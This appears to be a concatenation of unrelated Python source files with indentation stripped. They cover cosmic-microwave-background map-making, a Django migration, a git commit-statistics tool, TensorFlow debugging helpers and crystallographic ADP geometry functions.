out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
max=lim, title=msg + ' ' + kind,
sub=(3, 3, iplot + i), return_projected_map=True)]
return out
def profile(x,y,range=None,nbins=10,fmt=None,plot=True, dispersion=True, color=None):
if range == None:
mini = np.min(x)
maxi = np.max(x)
else:
mini = range[0]
maxi = range[1]
dx = (maxi - mini) / nbins
xmin = np.linspace(mini,maxi-dx,nbins)
xmax = xmin + dx
xc = xmin + dx / 2
yval = np.zeros(nbins)
dy = np.zeros(nbins)
dx = np.zeros(nbins) + dx / 2
for i in np.arange(nbins):
ok = (x > xmin[i]) & (x < xmax[i])
yval[i] = np.mean(y[ok])
if dispersion:
fact = 1
else:
fact = np.sqrt(len(y[ok]))
dy[i] = np.std(y[ok])/fact
if plot: errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
return xc, yval, dx, dy
nside = 256
racenter = 0.0 # deg
deccenter = -57.0 # deg
center = equ2gal(racenter, deccenter)
sky = read_map(PATH + 'syn256_pol.fits')
sampling = create_random_pointings([racenter, deccenter], 1000, 10)
all_solutions_fusion = []
all_coverages = []
nbptg = np.linspace(1000,5000,5)
correct_time = 365*86400./(nbptg/1000)
detector_nep = 4.7e-17/np.sqrt(correct_time / len(sampling)*sampling.period)
for i in xrange(len(all_instruments)):
acq_qubic = QubicAcquisition(150, sampling, nside=nside,
detector_nep=detector_nep[i])
all_coverages.append(acq_qubic.get_coverage())
convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky)
acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
H = acq_fusion.get_operator()
invntt = acq_fusion.get_invntt_operator()
obs = acq_fusion.get_observation()
A = H.T * invntt * H
b = H.T * invntt * obs
solution_fusion = pcg(A, b, disp=True)
all_solutions_fusion.append(solution_fusion)
mask = all_coverages[0] > np.max(all_coverages[0]/10)
reso=3
Trange=[10, 10, 10]
for i in xrange(len(nbptg)):
figure(i)
resid = all_solutions_fusion[i]['x'] - convolved_sky
resid[~mask,:] = 0
display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
print(std(resid[mask,0]), std(resid[mask,1]), std(resid[mask,2]))
#savefig(names[i]+'.png')
cols=['black', 'red','blue','green', 'orange']
aa=0.2
rng = [-2,4]
fs=8
nb=20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)
qdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)
udata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)
subplot(3,1,1)
yscale('log')
xlabel('Normalized coverage')
ylabel('I RMS residuals')
ylim(0.1,2)
plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
if i==0: plot(idata[0], idata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3,1,2)
yscale('log')
xlabel('Normalized coverage')
ylabel('Q RMS residuals')
ylim(0.1,2)
plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
if i==0: plot(qdata[0], qdata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3,1,3)
yscale('log')
xlabel('Normalized coverage')
ylabel('U RMS residuals')
ylim(0.1,2)
plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
if i==0: plot(udata[0], udata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
#savefig('rms.png')
cols=['black', 'red','blue','green', 'orange']
aa=0.2
rng = [-2,4]
fs=8
nb=20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)
qdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)
udata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)
if i == 0 :
theidata = idata
theqdata = qdata
theudata = udata
subplot(3,1,1)
xlabel('Normalized coverage')
ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.,3)
plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
plot(idata[0], idata[3]/theidata[3], color=cols[i], label=names[i], lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3,1,2)
xlabel('Normalized coverage')
ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.,3)
plot(qdata[0], qdata[3]/theqdata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
subplot(3,1,3)
xlabel('Normalized coverage')
ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.,3)
plot(udata[0], udata[3]/theudata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
#savefig('rms_ratio.png')
|
7,932 | 7a359d4b31bd1fd35cd1a9a1de4cbf4635e23def | """
Write a program that prompts for the user’s favorite number.
Use json.dump() to store this number in a file. Write a separate program that reads in this value and
prints the message, “I know your favorite number! It’s _____.”
"""
import json
file_name = 'supporting_files/favourite_number.json'
favourite_number = input('Enter you favourite number')
with open(file_name, 'a') as file_object:
json.dump(favourite_number, file_object)
print(f'{favourite_number} is saved in {file_name}')
|
7,933 | 1e853d58c2066f3fbd381d0d603cd2fcece0cf15 | # Generated by Django 3.1.7 on 2021-05-05 23:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('travels', '0011_auto_20210505_2230'),
]
operations = [
migrations.RenameField(
model_name='trip',
old_name='hotel_decription',
new_name='hotel_description',
),
migrations.AlterField(
model_name='trip',
name='hotelstars',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6)], verbose_name='Gwiazdki hotelu'),
),
]
|
7,934 | 16446c2c5612a14d4364cbefb949da0b473f7454 | import contextlib
import datetime
import fnmatch
import os
import os.path
import re
import subprocess
import sys
import click
import dataset
def get_cmd_output(cmd):
"""Run a command in shell, and return the Unicode output."""
try:
data = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as ex:
data = ex.output
try:
data = data.decode("utf-8")
except UnicodeDecodeError:
data = data.decode("latin1")
return data
def load_commits(db, repo_name):
"""Load the commits from the current directory repo."""
SEP = "-=:=-=:=-=:=-=:=-=:=-=:=-=:=-"
GITLOG = f"git log --no-merges --format='format:date: %aI%nhash: %H%nauth: %aE%nname: %aN%nsubj: %s%n%b%n{SEP}'"
SHORT_LINES = 5
# $ git log --format="format:---------------------%ndate: %aI%nhash: %H%nauth: %aE%nname: %aN%nsubj: %s%n%b"
# ---------------------
# date: 2021-04-21T16:13:23-04:00
# hash: efa13ff1d2fb3d8b2ddee8be0868ae60f9bc35a6
# auth: julia.eskew@edx.org
# name: Julia Eskew
# subj: fix: TNL-8233: Change exception raised at problem creation failure from generic exception to LoncapaProblemError. (#27361)
# Raising this specific exception will cause the failure to be handled more gracefully by problem rescoring code.
# ---------------------
# date: 2021-04-15T21:36:47-04:00
# hash: a1fe3d58dc112bd975f1237baaee787ba22929f1
# auth: astaubin@edx.org
# name: Albert (AJ) St. Aubin
# subj: [bug] Corrected issue where program dash showed incorrect completed count
# [MICROBA-1163]
#
# This change will correct an issue in the Program Dashboard where a user
# would see a course as completed, but not see their Certificate because
# it was not available to them yet.
# ---------------------
with db:
commit_table = db["commits"]
log = get_cmd_output(GITLOG)
for i, commit in enumerate(log.split(SEP + "\n")):
if commit:
lines = commit.split("\n", maxsplit=SHORT_LINES)
row = {"repo": repo_name}
for line in lines[:SHORT_LINES]:
key, val = line.split(": ", maxsplit=1)
row[key] = val
row["body"] = lines[SHORT_LINES].strip()
analyze_commit(row)
commit_table.insert(row)
STRICT = r"""(?x)
^
(?P<label>build|chore|docs|feat|fix|perf|refactor|revert|style|test|temp)
(?P<breaking>!?):\s
(?P<subjtext>.+)
$
"""
LAX = r"""(?xi)
^
(?P<label>\w+)
(?:\(\w+\))?
(?P<breaking>!?):\s
(?P<subjtext>.+)
$
"""
def analyze_commit(row):
row["conventional"] = row["lax"] = False
m = re.search(STRICT, row["subj"])
if m:
row["conventional"] = True
else:
m = re.search(LAX, row["subj"])
if m:
row["lax"] = True
if m:
row["label"] = m["label"]
row["breaking"] = bool(m["breaking"])
row["subjtext"] = m["subjtext"]
row["bodylines"] = len(row["body"].splitlines())
@contextlib.contextmanager
def change_dir(new_dir):
"""Change directory, and then change back.
Use as a context manager, it will give you the new directory, and later
restore the old one.
"""
old_dir = os.getcwd()
os.chdir(new_dir)
try:
yield os.getcwd()
finally:
os.chdir(old_dir)
@click.command(help="Collect stats about commits in local git repos")
@click.option("--db", "dbfile", default="commits.db", help="SQLite database file to write to")
@click.option("--ignore", multiple=True, help="Repos to ignore")
@click.option("--require", help="A file that must exist to process the repo")
@click.argument("repos", nargs=-1)
def main(dbfile, ignore, require, repos):
db = dataset.connect("sqlite:///" + dbfile)
for repo in repos:
if any(fnmatch.fnmatch(repo, pat) for pat in ignore):
print(f"Ignoring {repo}")
continue
if require is not None:
if not os.path.exists(os.path.join(repo, require)):
print(f"Skipping {repo}")
continue
print(repo)
with change_dir(repo) as repo_dir:
repo_name = "/".join(repo_dir.split("/")[-2:])
load_commits(db, repo_name)
if __name__ == "__main__":
main()
# then:
# gittreeif nedbat/meta/installed python /src/ghorg/commitstats.py /src/ghorg/commits.db
#
# in sqlite:
# select strftime("%Y%W", date, "weekday 0") as yw, count(*) total, sum(conventional) as con from commits group by yw;
# select yw, total, con, cast((con*100.0)/total as integer) pctcon from (select strftime("%Y%W", date, "weekday 0") as yw, count(*) total, sum(conventional) as con from commits group by yw);
"""
select
weekend, total, con, cast((con*100.0)/total as integer) pctcon, bod, cast((bod*100.0)/total as integer) pctbod
from (
select
strftime("%Y%m%d", date, "weekday 0") as weekend,
count(*) total,
sum(conventional) as con, sum(bodylines > 0) as bod
from commits where repo = "edx/edx-platform" group by weekend
)
where weekend > '202009';
"""
|
7,935 | 4758d6efde21e3b5d91f107188f24b6ddf7cbbe4 | import numpy as np
import tensorflow as tf
import math
from .. import util
def debug_inference(inference, dummy, entropy, cross_entropy, expected_log_likelhood):
dummy = tf.Print(dummy, [entropy], 'entropy: ')
dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
dummy = tf.Print(dummy, [expected_log_likelhood], 'expected_log_likelhood: ')
#dummy = tf.Print(dummy, [inference.q_means_u], 'self.q_means_u: ')
#dummy = tf.Print(dummy, [inference.q_covars_u], 'self.q_covars_u: ')
#dummy = tf.Print(dummy, [inference.q_means_v], 'self.q_means_v: ')
#dummy = tf.Print(dummy, [inference.q_covars_v], 'self.q_covars_v: ')
return dummy
def matrix_conditions(session, inference):
for j in range(inference.num_latent):
k_j = inference.kern_f[j]
K_zz_f = k_j.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)
mat = K_zz_f.eval(session=session)
cond = np.linalg.cond(mat)
sigma = k_j.sigma.eval(session=session)
ls = k_j.length_scales.eval(session=session)
print('MATRIX CONDITION F('+str(j)+'): ', cond)
print('SIGMA F('+str(j)+'): ', sigma)
print('LENGTH_SCALES F('+str(j)+'): ', ls)
print(mat)
for j in range(inference.num_latent):
for i in range(inference.num_outputs):
k_ij = inference.kern_w[i][j]
K_zz_w = k_ij.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)
mat = K_zz_w.eval(session=session)
cond = np.linalg.cond(mat)
sigma = k_ij.sigma.eval(session=session)
ls = k_ij.length_scales.eval(session=session)
print('MATRIX CONDITION W('+str(i)+','+str(j)+'): ', cond)
print('SIGMA W('+str(i)+','+str(j)+'): ', sigma)
print('LENGTH_SCALES W('+str(i)+','+str(j)+'): ', ls)
print(mat)
|
7,936 | 27e685750e5caa2f80c5a6399b07435ee9aa9fb9 | """
Created on Feb 10, 2013
@author: jens
Deprecated module for crystallogrphy related geometry operations. And a lot
of other stuff that I put here.
"""
import numpy as np
atomtable = {'H': 1, 'He': 2, 'Li': 3, 'Be': 4, 'B': 5, 'C': 6, 'N': 7, 'O': 8,
'F': 9, 'Ne': 10, 'Na': 11, 'Mg': 12, 'Al': 13, 'Si': 14, 'P': 15,
'S': 16, 'Cl': 17, 'Ar': 18, 'K': 19, 'Ca': 20, 'Sc': 21, 'Ti': 22,
'V': 23, 'Cr': 24, 'Mn': 25, 'Fe': 26, 'Co': 27, 'Ni': 28, 'Cu': 29,
'Zn': 30, 'Ga': 31, 'Ge': 32, 'As': 33, 'Se': 34, 'Br': 35, 'Kr': 36}
covalence_radius = {'H': .37, 'He': .0, 'Li': 1.23, 'Be': .90, 'B': .80, 'C': .77,
'N': .74, 'O': .71, 'F': .72, 'Ne': 0., 'Na': 1.54, 'Mg': 1.36,
'Al': 1.18, 'Si': 1.11, 'P': 1.06, 'S': 1.02, 'Cl': .99, 'Ar': 0.,
'K': 2.03, 'Ca': 1.74, 'Sc': 1.44, 'Ti': 1.32, 'V': 1.22,
'Cr': 1.18, 'Mn': 1.17, 'Fe': 1.17, 'Co': 1.16, 'Ni': 1.15,
'Cu': 1.17, 'Zn': 1.25, 'Ga': 1.26, 'Ge': 1.22, 'As': 1.20,
'Se': 1.16, 'Br': 1.14, 'Kr': 0.,
'Rb': 2.18} # , 191, 162, 145, 134, 130, 127, 125, 125, 128, 134, 148, 144, 141, 140, 136, 133, 0, 235, 198, 169, 165, 165, 164, 164, 162, 185, 161, 159, 159, 157, 157, 156, 170, 156, 144, 134, 130, 128, 126, 127, 130, 134, 149, 148, 147, 146, 146, 145, 0, 0, 0, 188, 165, 161, 142, 130, 151, 182, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}
electro_negativ = {'H': 2.20, 'He': 5.50, 'Li': .97, 'Be': 1.47, 'B': 2.01, 'C': 2.50,
'N': 3.07, 'O': 3.50, 'F': 4.40, 'Ne': 4.80, 'Na': 1.01, 'Mg': 1.23,
'Al': 1.47, 'Si': 1.74, 'P': 2.06, 'S': 2.44, 'Cl': 2.83, 'Ar': 3.20,
'K': .91, 'Ca': 1.04, 'Sc': 1.20, 'Ti': 1.32, 'V': 1.45,
'Cr': 1.56, 'Mn': 1.60, 'Fe': 1.64, 'Co': 1.70, 'Ni': 1.75,
'Cu': 1.75, 'Zn': 1.66, 'Ga': 1.82, 'Ge': 2.02, 'As': 2.20,
'Se': 2.48, 'Br': 2.74, 'Kr': 2.90,
'Rb': .89} # , 99, 111, 122, 123, 130, 136, 142, 145, 130, 142, 146, 149, 172, 182, 201, 221, 240, 86, 97, 108, 108, 107, 107, 107, 107, 110, 111, 110, 110, 110, 111, 111, 106, 114, 123, 133, 140, 146, 152, 155, 142, 142, 144, 144, 155, 167 }
proton_number = {'H': '001', 'He': '002', 'Li': '003', 'Be': '004', 'B': '005', 'C': '006', 'N': '007', 'O': '008',
'F': '009', 'Ne': '010', 'Na': '011', 'Mg': '012', 'Al': '013', 'Si': '014', 'P': '015',
'S': '016', 'Cl': '017', 'Ar': '018', 'K': '019', 'Ca': '020', 'Sc': '021', 'Ti': '022',
'V': '023', 'Cr': '024', 'Mn': '025', 'Fe': '026', 'Co': '027', 'Ni': '028', 'Cu': '029',
'Zn': '030', 'Ga': '031', 'Ge': '032', 'As': '033', 'Se': '034', 'Br': '035', 'Kr': '036'}
number_proton = dict([[v, k] for k, v in proton_number.items()])
priority = {'3': '5',
'2': '4',
'1.5': '3',
'6': '2',
'5': '1',
'1': '0'}
def frac2cart(coords, matrix):
coords = np.dot(matrix, coords).flatten().tolist()[0]
return coords
def xd_element(name):
"""
Return the element of an atom as defined in it's label.
"""
try:
name = name[:2]
except:
pass
try:
covalence_radius[name]
except:
name = name[0]
return name
def Uiso(adp, mean='geometric'):
try:
adp = get_adp_as_matrix(adp)
eigvals = np.linalg.eigvals(adp)
if mean == 'geometric':
return (abs(eigvals[0]) * abs(eigvals[1]) * abs(eigvals[2])) ** (1. / 3.)
elif mean == 'arithmetic':
return sum(eigvals) / 3.
else:
print('crystgeom: Error: please specify mean as \'geometric\' or \'arithmetic\'')
exit()
except:
return adp
def get_adp_as_matrix(adp):
if adp is None:
return None
return np.matrix([[adp[0], adp[3], adp[4]],
[adp[3], adp[1], adp[5]],
[adp[4], adp[5], adp[2]]])
def get_compound_properties(path):
"""
Reads a *.FChk file and returns a list containing the charge of
the compound, the number of electrons in the compound, the overall
lengths of the dipole moment vector and the total HF energy.
"""
filepointer = open(path)
charge = None
NE = None
E_HF = None
dipole = None
read_dipole = False
for line in filepointer:
if read_dipole:
read_dipole = False
dipole = [float(value) for value in line.split(' ') if '.' in value]
dipole = np.linalg.norm(dipole)
elif 'Charge' in line and not charge:
charge = line.split(' ')[-1].rstrip('\n')
elif 'Number of electrons' in line and not NE:
NE = line.split(' ')[-1].rstrip('\n')
elif 'Total Energy' in line and not E_HF:
E_HF = line.split(' ')[-1].rstrip('\n')
elif 'Dipole Moment' in line and not dipole:
read_dipole = True
if charge and NE and E_HF and dipole:
break
return [charge, NE, dipole, E_HF]
def center_molecule(atom_coords):
center = get_geom_center(atom_coords)
atom_coords = move_center_to_point(atom_coords, center)
return atom_coords
def get_pair_list(atom_elements_1, atom_coords_1,
atom_elements_2, atom_coords_2):
pair_list = []
for i in xrange(len(atom_coords_1)):
best_hit = (9, None)
for j in xrange(len(atom_coords_2)):
dist = np.linalg.norm(atom_coords_1[i] - atom_coords_2[j])
if dist < best_hit[0] and atom_elements_1[i] == atom_elements_2[j]:
best_hit = (dist, j)
pair_list.append(best_hit[1])
# ===========================================================================
# print
# for i in xrange(len(pair_list)):
# print atom_atoms_1[i],atom_atoms_2[pair_list[i]]
#===========================================================================
return pair_list
def bond_order(bondxi,
threshold_single_meso=0.0847,
# ================================================================
# threshold_meso_double=0.184,
#================================================================
threshold_meso_double=0.0847,
threshold_double_triple=0.27):
"""
Returns the bond order between two atoms.
"""
if bondxi < threshold_single_meso:
order = '1'
elif bondxi < threshold_meso_double:
order = '1.5'
elif bondxi < threshold_double_triple:
order = '2'
else:
order = '3'
return order
# ===============================================================================
# def rotate_3D_symmetric(atom,source_atom):
# '''
# Rotates the ADP of 'atom' to match the orientation
# of 'source_atom.
# '''
# cosangle=np.dot(atom.orientation[0],source_atom.orientation[0])
# angle=np.arccos(cosangle)
# axis=np.cross(atom.orientation[0],source_atom.orientation[0])
# axis=axis/np.linalg.norm(axis)
# matrix=get_3drotation_matrix(axis,angle)
# orientation0_new=np.dot(source_atom.orientation[0],matrix)
# if np.linalg.norm(orientation0_new-atom.orientation[0])<0.00001:
# pass
# else:
# angle=angle*-1
# matrix=get_3drotation_matrix(axis,angle)
#
# atom.adp['cart_int']=rotate_adp(source_atom.adp['cart_int'],matrix)
#===============================================================================
def rotate_3D(atom, source_atom):
"""
Rotates the ADP of 'atom' to match the orientation
of 'source_atom.
"""
from lauescript.cryst.match import get_transform
lst2 = [np.array([0, 0, 0]), source_atom.orientation[0], source_atom.orientation[1]]
lst1 = [np.array([0, 0, 0]), atom.orientation[0], atom.orientation[1]]
matrix = get_transform(lst1, lst2, matrix=True)
adp = source_atom.adp['cart_int']
atom.adp['cart_int'] = rotate_adp(adp, matrix)
def xi(element1, element2, distance):
"""
Calculates the bond distinguishing parameter Xi.
"""
return (float(covalence_radius[element1]) + float(covalence_radius[element2]) -
(0.08 * float(abs(electro_negativ[element1] - electro_negativ[element2]))) - distance)
def get_orientation_vector(atom1, atom2):
v = atom1.cart - atom2.cart
return v / np.linalg.norm(v)
def framework_crawler(atom, direction, rigid_group_old=None):
"""
Function to identify atoms belonging to a previosly defined rigid
group.
Arguments:
atom: the name of the first atom of the rigid group.
direction: the name of the second atom of the rigid group.
rigid_group_old: used by the function itself for consecutive calls.
Returns a list of atom names belonging to the rigid group.
"""
if not rigid_group_old:
rigid_group = [atom, direction]
else:
rigid_group = rigid_group_old
for atom in get_framework_neighbours(direction):
if not atom in rigid_group and not atom.element == 'H':
rigid_group.append(atom)
framework_crawler(rigid_group[0], atom, rigid_group)
if not rigid_group_old:
#=======================================================================
# print ' Determined rigid group:', [i.name for i in rigid_group]
#=======================================================================
return rigid_group
def get_closest_atom_of_element(element, atom, exclude=None):
"""
Returns the atom with the shortest distance to the given atom.
"""
for atom2 in atom.partner:
if (element == atom2.element or not element) and not atom2 == exclude:
return atom2
def get_atom_with_longest_bond(element, atom):
hit = None
for atom2 in atom.partner:
if element in atom2.name:
if np.linalg.norm(atom.cart - atom2.cart) < 1.8:
hit = atom2
else:
break
return hit
def get_framework_neighbours(atom, useH=True):
"""
Needs a ATOM.atom instance as argument.
Returns the names of the framework atoms bound to that atom.
"""
neighbourlist = []
for atom2 in atom.partner[:5]:
#if not 'H(' in atom2.name and np.linalg.norm(atom.cart-atom2.cart)<=1.6:
if np.linalg.norm(atom.cart - atom2.cart) <= float(covalence_radius[atom.element]) + float(
covalence_radius[atom2.element]) + .1:
if not 'H' == atom2.element or useH:
neighbourlist.append(atom2)
return neighbourlist
#===============================================================================
# def get_framework_neighbours(atom,useH=True):
# """
# Needs a classes.atom instance as argument.
# Returns the names of the framework atoms bound to that atom.
# """
# neighbourlist=[]
# for atom2 in atom.partner[atom.molecule.name][1:5]:
# #if not 'H(' in atom2.name and np.linalg.norm(atom.cart-atom2.cart)<=1.6:
# if np.linalg.norm(atom.cart-atom2.cart)<=1.6:
# if not 'H(' in atom2.name or useH:
# neighbourlist.append(atom2)
# return neighbourlist
#===============================================================================
def read_meas_adp(data, path='xd.res', use='meas'):
"""
Reads the measured ADP from the xd.res file.
The parameters are stored in atom.adp['frac_meas'] and
atom.adp['cart_meas']
"""
use2 = 'frac_' + use
switch = False
filepointer = open(path, 'r')
atomname = None
for line in filepointer:
if switch:
split = [i for i in line.split(' ') if len(i) > 0]
if not len(split) == 6:
print('WARNING!!! Inconsistend number of floats while\
reading measured ADP.')
data['exp'][atomname].adp[use2] = split
switch = False
if '(' in line:
split = [i for i in line.split(' ') if len(i) > 0]
if split[0][-1] == ')':
switch = True
atomname = split[0]
use = 'cart_' + use
for atom in data['exp'].atoms:
# if use == 'cart_neut': print(atom)
atom.adp[use] = rotate_adp2(atom.adp[use2],
atom.molecule.frac2cartmatrix,
atom.molecule.cell)
return data
def reflect_adp(adp, planev):
"""
Returns the ADP after reflection on the plane defined by its normal
vector 'planev'.
"""
M = np.identity(4)
M[:3, :3] -= 2.0 * np.outer(planev, planev)
M[:3, 3] = (2.0 * np.dot(np.array([0, 0, 0]), planev)) * planev
return rotate_adp(adp, M[:3, :3])
def eigenv2tensor(axis):
"""
Calculates the tensor representation of ADP from its priciple axis.
"""
vec = np.ones((3, 3))
vecval = np.ones((3, 3))
for i in xrange(len(axis)):
vmag = np.linalg.norm(axis[i])
v = axis[i] / vmag
#print v
vec[:, i] = v
vecval[:, i] = axis[i]
adp = np.linalg.solve(vec, vecval)
return adp
def get_adp_from_calc(vx, vy, vz):
"""
Calculates an ADP in its matrix representation from the three
principle axis representing the displacement ellipsoid.
The three principle axis of the ellipsoid are needed as arguments.
A Matrix representation of the ADP is returned.
"""
## lx=np.linalg.norm(vx)
## ly=np.linalg.norm(vy)
## lz=np.linalg.norm(vz)
lx = vx
ly = vy
lz = vz
L = np.matrix([[lx, 0, 0],
[0, ly, 0],
[0, 0, lz]])
## Vx=vx/lx
## Vy=vy/ly
## Vz=vz/lz
Vx = np.array([1, 0, 0])
Vy = np.array([0, 1, 0])
Vz = np.array([0, 0, 1])
V = np.matrix([[Vx[0], Vy[0], Vz[0]],
[Vx[1], Vy[1], Vz[1]],
[Vx[2], Vy[2], Vz[2]]])
Vinv = np.linalg.inv(V)
#print V,Vinv
M = np.dot(np.dot(Vinv, L), V)
#print M
return M
#===============================================================================
#
#
# def get_general_distances(coordlist1,coordlist2,atomlist1,atomlist2):
# """
# Calculates a distance dictionary between two sets of atoms.
# Returns a dictionary entry for every atom in atomlist1 with the inter atom
# distances and the corresponding atom name keyed to their atom type.
#
# This function is used by the get_best_point() function.
# """
# maindict={}
# for i in xrange(len(atomlist1)):
# distdict={}
# for j in xrange(len(atomlist2)):
# if not atomlist2[j][0] in distdict.keys():
# distdict[atomlist2[j][0]]=[[np.linalg.norm(coordlist1[i]-coordlist2[j]),atomlist2[j]]]
# else:
# distdict[atomlist2[j][0]].append([np.linalg.norm(coordlist1[i]-coordlist2[j]),atomlist2[j]])
# ## print atomlist1[i],'aaaaaaaaaaa'
# maindict[atomlist1[i]]=distdict
# return maindict
#===============================================================================
def get_best_quaternion(coordlist1, coordlist2):
"""
Determines the the quaternion representing the best possible
transformation of two coordinate systems into each other using
a least sqare approach.
This function is used by the get_refined_rotation() function.
"""
M = np.matrix([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
if len(coordlist1) <= len(coordlist2):
number = len(coordlist1)
else:
number = len(coordlist2)
for i in xrange(number):
aaa = np.matrix(np.outer(coordlist1[i], coordlist2[i]))
M = M + aaa
N11 = float(M[0][:, 0] + M[1][:, 1] + M[2][:, 2])
N22 = float(M[0][:, 0] - M[1][:, 1] - M[2][:, 2])
N33 = float(-M[0][:, 0] + M[1][:, 1] - M[2][:, 2])
N44 = float(-M[0][:, 0] - M[1][:, 1] + M[2][:, 2])
N12 = float(M[1][:, 2] - M[2][:, 1])
N13 = float(M[2][:, 0] - M[0][:, 2])
N14 = float(M[0][:, 1] - M[1][:, 0])
N21 = float(N12)
N23 = float(M[0][:, 1] + M[1][:, 0])
N24 = float(M[2][:, 0] + M[0][:, 2])
N31 = float(N13)
N32 = float(N23)
N34 = float(M[1][:, 2] + M[2][:, 1])
N41 = float(N14)
N42 = float(N24)
N43 = float(N34)
N = np.matrix([[N11, N12, N13, N14],
[N21, N22, N23, N24],
[N31, N32, N33, N34],
[N41, N42, N43, N44]])
values, vectors = np.linalg.eig(N)
w = list(values)
quat = vectors[:, w.index(max(w))]
quat = np.array(quat).reshape(-1, ).tolist()
return quat, max(w)
def get_rotation_matrix_from_quaternion(q):
"""
Returns the rotation matrix equivalent of the given quaternion.
This function is used by the get_refined_rotation() function.
"""
R = np.matrix([[q[0] * q[0] + q[1] * q[1] - q[2] * q[2] - q[3] * q[3],
2 * (q[1] * q[2] - q[0] * q[3]),
2 * (q[1] * q[3] + q[0] * q[2])],
[2 * (q[2] * q[1] + q[0] * q[3]),
q[0] * q[0] - q[1] * q[1] + q[2] * q[2] - q[3] * q[3],
2 * (q[2] * q[3] - q[0] * q[1])],
[2 * (q[3] * q[1] - q[0] * q[2]),
2 * (q[3] * q[2] + q[0] * q[1]),
q[0] * q[0] - q[1] * q[1] - q[2] * q[2] + q[3] * q[3]]])
return R
def get_geom_center(coordlist):
"""
Calculates the geometrical center of a set of points.
"""
return sum(coordlist) / len(coordlist)
def move_center_to_point(atomlist, point):
"""
Moves the geometrical center of the atoms in atomlist to the given point.
"""
for atom in range(len(atomlist)):
atomlist[atom] = atomlist[atom] - point
return atomlist
def rotate_adp_reverse(adp, rotmat):
"""
Rotates the adp with its corresponding rotation matrix.
"""
adp = np.matrix([[float(adp[0]), float(adp[3]), float(adp[4])],
[float(adp[3]), float(adp[1]), float(adp[5])],
[float(adp[4]), float(adp[5]), float(adp[2])]])
rotmatT = np.transpose(rotmat)
adp = np.dot(rotmat, adp)
adp = np.dot(adp, rotmatT)
adp = np.array(adp).flatten().tolist()
return [adp[0], adp[4], adp[8], adp[1], adp[2], adp[5]]
def rotate_adp(adp, rotmat):
"""
Rotates the adp with its corresponding rotation matrix.
"""
adp = np.matrix([[float(adp[0]), float(adp[3]), float(adp[4])],
[float(adp[3]), float(adp[1]), float(adp[5])],
[float(adp[4]), float(adp[5]), float(adp[2])]])
rotmatT = np.transpose(rotmat)
adp = np.dot(rotmatT, adp)
adp = np.dot(adp, rotmat)
# print '=\n',adp,'\n-------------------------------------------------\n\n\n\n\n\n'
adp = np.array(adp).flatten().tolist()
return [adp[0], adp[4], adp[8], adp[1], adp[2], adp[5]]
def rotate_adp2(adp, rotmat, cell):
"""
Rotates the adp with its corresponding rotation matrix.
"""
adp = np.matrix([[float(adp[0]), float(adp[3]), float(adp[4])],
[float(adp[3]), float(adp[1]), float(adp[5])],
[float(adp[4]), float(adp[5]), float(adp[2])]])
rotmat = np.linalg.inv(rotmat)
rotmatT = np.transpose(rotmat)
Nmat = np.matrix([[1 / cell[0], 0, 0],
[0, 1 / cell[1], 0],
[0, 0, 1 / cell[2]]])
Nmat = np.linalg.inv(Nmat)
NmatT = np.transpose(Nmat)
adp = np.dot(rotmat, adp)
adp = np.dot(adp, rotmatT)
adp = np.dot(Nmat, adp)
adp = np.dot(adp, NmatT)
adp = np.array(adp).flatten().tolist()
return [adp[0], adp[4], adp[8], adp[1], adp[2], adp[5]]
def rotate_adp3(adp, rotmat, cell):
"""
Rotates the adp with its corresponding rotation matrix.
"""
adp = np.matrix([[float(adp[0]), float(adp[3]), float(adp[4])],
[float(adp[3]), float(adp[1]), float(adp[5])],
